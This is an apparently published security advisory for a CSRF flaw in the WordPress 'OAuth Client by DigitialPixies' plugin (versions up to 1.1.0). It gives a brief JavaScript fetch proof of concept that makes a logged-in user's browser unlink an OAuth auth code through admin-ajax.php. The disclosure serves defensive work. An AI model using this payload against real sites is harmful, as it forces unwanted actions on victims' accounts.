WordPress Plugin Vulnerabilities

OAuth Client by DigitialPixies <= 1.1.0 - CSRF

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions.

Proof of Concept

Make a logged in user visit a page with the following code

fetch('https://example.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=dpt-oauth-ajax&call=unlink_auth_code',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

No known fix

References

Classification

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-10-21 (about 1 years ago)
Added
2022-10-21 (about 1 years ago)
Last Updated
2022-10-21 (about 1 years ago)

Other